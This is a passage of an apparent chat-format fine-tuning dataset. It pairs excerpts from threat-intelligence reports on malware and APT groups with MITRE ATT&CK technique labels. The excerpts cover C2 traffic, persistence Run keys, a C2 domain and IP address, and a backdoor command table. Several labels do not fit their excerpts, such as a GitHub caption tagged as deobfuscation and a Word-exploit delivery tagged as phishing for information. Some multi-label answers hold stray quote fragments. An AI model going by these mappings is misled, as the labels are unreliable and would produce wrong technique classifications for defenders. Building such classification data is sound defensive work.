procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kevin has Base64-encoded its configuration file." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore but all the communications are performed with WinInet. The malware performs connection to the C2 server by using InternetOpenA() with an hardcoded User-Agent: \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322\". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. On the left a sample from Bisonal 2014 and on the right Bisonal 2011" }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 2 – The GitHub profile for F0R3X containing both legitimate forked code and the binaries created by the attacker" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Poseidon Group tools attempt to spoof anti-virus processes as a means of self-defense." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has downloaded additional code and files from servers onto victims." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "STARWHALE has the ability to hex-encode collected data from an infected host." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can implement DGA using the current date as a seed variable." }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the ability to modify the Registry." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThreatNeedle chooses its payload creation path from a randomly selected service name from netsvc." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Then, it modifies the Team Viewer registry settings. As we said, the Team Viewer components used in this campaign are not the original ones. They are slightly modified. The malware author replaced all the entries of “Teamviewer” strings in Team Viewer components. TeamViewer client registry settings are then HKLMSoftwareGoldstagerVersion5 and HKLMSoftwareCoinstagerVersion5 correspondingly. The launcher sets up several registry values that control how the remote access tool will work. This parameter represents a hash of the password with which a remote user has to connect to Team Viewer client. After that, the starter executes the very Team Viewer client netsvcs.exe" }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee can download and execute additional payloads including through the use of a `Dex` command." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used LinkedIn to identify and target specific employees within a chosen organization." }, { "role": "assistant", "content": "T1593.001 - Social Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAMMERTOSS is controlled via commands that are appended to image files." }, { "role": "assistant", "content": "T1001.002 - Data Obfuscation via Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pay2Key can remove its log file from disk." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ServHelper will attempt to enumerate the username of the victim." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Peirates can query the query AWS and GCP metadata APIs for secrets." }, { "role": "assistant", "content": "T1552.005 - Unsecured Credentials: Cloud Instance Metadata API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuietSieve can collect files from a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DropBook has used legitimate web services to exfiltrate data." }, { "role": "assistant", "content": "T1567 - Exfiltration Over Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mosquito stores configuration values under the Registry key \"HKCU\\Software\\Microsoft\\[dllname]\" and modifies Registry keys under \"HKCR\\CLSID\\...\\InprocServer32\"with a path to the launcher." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malware Delivery Method In all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors used the `tasklist` command to search for one of its backdoors." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SNUGRIDE is capable of executing commands and spawning a reverse shell." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WellMail can archive files on the compromised host." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Then calls the fcL4qOb4 function to set the scheduled task and disguise as the one used by Google" }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used compromised WordPress blogs as C2 servers." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSOURCE queries Registry keys in preparation for setting Run keys to achieve persistence." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec can exfiltrate data via a DNS tunnel or email, separately from its C2 channel." }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has commands to delete files and persistence mechanisms from the victim." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wingbird uses services.exe to register a new autostart service named \"Audit Service\" using a copy of the local lsass.exe file." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service', 'T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker can perform a UAC bypass if it is not executed with administrator rights or if the infected host runs Windows Vista or later." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt ." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Yet, both in August 2018 and 2019 Silent Librarian was lining up for the new academic years, once again targeting the same kind of victims in over a dozen countries" }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Invoke-Mimikatz.ps1 is the PowerShell implementation of Mimikatz. The PowerShell script loads Mimikatz.exe reflectively into the process memory." }, { "role": "assistant", "content": "T1620 - Reflective Code Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The same code snippets are combined into a second stage JavaScript in “C:\\Users\\\\”" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At the end of August 2018, the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components. In the past, Sednit used a similar technique for credential phishing. However, it is unusual for the group to use this technique to deliver one of its malware components directly. Previously, it had used exploits to deliver and execute the first stage malware, while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain. The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign" }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "binds and listens on port 1058." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carberp has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As mentioned in the table above, version 3 has two forms - one is an independent executable, and the other is a loader that loads a DLL from the resources section and executes it. Even before doing any static / dynamic analysis, we can use VirusTotal to determine that the resources section probably contains more data, in this case an encrypted DLL that is loaded into memory" }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One variant of CloudDuke uses a Microsoft OneDrive account to exchange commands and stolen data with its operators." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla has used \"ProcessWindowStyle.Hidden\" to hide windows." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ember Bear has stolen legitimate certificates to sign malicious payloads." }, { "role": "assistant", "content": "T1588.003 - Code Signing Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We can also see files created in a TEMP folder that are serving as a small database, where Dyreza stores information, before they are sent to the C&C" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The started command will send the following information to the C&C: device_model: the model identifier (e.g.: MacBookPro9,2) bot_version: version of Keydnap build_name: the “build name” that was given by downloader os_version: OS X or macOS kernel version ip_address: external IP address as reported by ipify.org has_root: 1 if executed as root, 0 otherwise Backdoor commands The response to get_task contains an integer to identify the type of command and optional arguments" }, { "role": "assistant", "content": "T1082 - System Information Discovery', 'T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole has used rundll32.exe for execution." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A separate communication channel is created for each installed module. The communication protocol used is TLS over TCP. The communication is handled with the HP-Socket library. All the messages are RC4 encrypted using the hardcoded key. If the size of the message to be transferred is greater than or equal to 4KB, it is first compressed using zlib’s Deflate implementation" }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BACKSPACE achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpicyOmelette has been executed through malicious links within spearphishing emails." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "communicates with its C2 servers over HTTP." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KeyBoy can gather extended system information, such as information about the operating system, disks, and memory." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The inclusion of both phone and IMSI numbers show the highly targeted nature of this cyber intrusion. If an SMS message contained either a phone number or an IMSI number that matched the predefined list, it was saved to a CSV file for later theft by the threat actor" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging', 'T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Penquin can sniff network traffic to look for packets matching specific conditions." }, { "role": "assistant", "content": "T1040 - Network Sniffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak has been delivered via spearphishing e-mails with password protected ZIP files." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DanBot files have been named `UltraVNC.exe` and `WINVNC.exe` to appear as legitimate VNC tools." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Following initial access, GRIM SPIDER focuses on collecting credentials from the compromised hosts and uses existing RDP in an attempt to get a domain administrator account and access to the Windows Domain Controller. This process can take several iterations of harvesting credentials, connecting to new systems and establishing persistence" }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The success of the Dropping Elephant group is striking given that no zero-day exploits or advanced techniques were used to target high-profile victims – it’s clear that by applying security updates and improving the security awareness of staff, the success of attacks like this can be prevented. At the start of the year we predicted that APT groups would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware. Dropping Elephant provides a further example of how low investment and use of ready-made toolsets can be very effective when combined with high quality social engineering." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ‘jli.dll’ file acts as the first layer of the Ecipekac loader. This DLL file has a number of export functions; however, all of them refer to a similar function that carries the main loading feature" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of spawning a Windows command shell." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Poseidon Group's Information Gathering Tool (IGT) includes PowerShell components." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Backdoor.Remexi, one of the malware in use by Chafer, had the following  command and control host: 87pqxz159.dockerjsbin[.]com Interestingly, IP address  83.142.230.138, which serve as a command and control address for an OilRig related sample (3a5fcba80c1fd685c4b5085d9d474118), was pointed to by 87pqxz159.dockerjsbin[.]com as well" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery', 'T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The threat actors also took additional steps to replace some variable strings in the more recent samples, likely in an attempt to avoid signature-based detection from Yara rules. Once the document was opened, it prompted the user to enable the macro titled \"BlackWater.bas\"." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Then pastebin.com, github.com, mailimg.com, upload.cat, dev-point.com and pomf.cat were used as channels for the different malware stages before achieving a full RAT implementation, which then communicates with the corresponding C2 server" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TYPEFRAME has used a malicious Word document for delivery with VBA macros for execution." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has established persistence by setting the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run key value for wdm to the path of the executable. It has also used the Registry entry HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run vpdn “%ALLUSERPROFILE%\\%APPDATA%\\vpdn\\VPDN_LU.exe” to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used spearphishing emails with malicious Microsoft Word attachments to infect victims." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Analysis of BRONZE BUTLER's operations, targeting, and capability led CTU researchers to assess that it is likely that the group is located in the PRC. The group has used spearphishing, strategic web compromises (SWCs), and an exploit of a zero-day vulnerability to compromise targeted systems. After exfiltrating targeted data from a network, BRONZE BUTLER typically deletes evidence of its activities. However, it maintains access to compromised environments when possible, periodically revisiting compromised sites to identify new opportunities for data exfiltration" }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bisonal has the capability to download files to execute on the victim’s machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TinyTurla has been deployed as `w64time.dll` to appear legitimate." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream has the ability to gather user information from the targeted system using `whoami/upn&whoami/fqdn&whoami/logonid&whoami/all`." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ajax Security Team has used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Along the way, HermeticWiper’s more mundane operations provide us with further IOCs to monitor for. These include the momentary creation of the abused driver as well as a system service. It also modifies several registry keys, including setting the SYSTEM\\CurrentControlSet\\Control\\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver’s execution starts" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rancor has used cmd.exe to execute commmands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As is evident here, the SSH server will accept connections on port number 6789. By running SSH on the server in a compromised network, attackers can come back to the network whenever they want" }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We suspect that the malware uses this extension to grab the victim’s cookies and use them from another device to ride the victim’s active session" }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Command IDDescription 0Uninstall Keydnap and quit 1Update the backdoor from a base64-encoded file 2Update the backdoor given a URL 3Decode and execute a base64-encoded file 4Decode and execute a base64-encoded Python script 5Download and execute a file from a URL 6Download and execute a Python script from a URL 7Execute a command and report the output back to the C&C server 8Request administrator privileges the next time the user runs an application 9Decode and execute, or stop, a base64-encoded 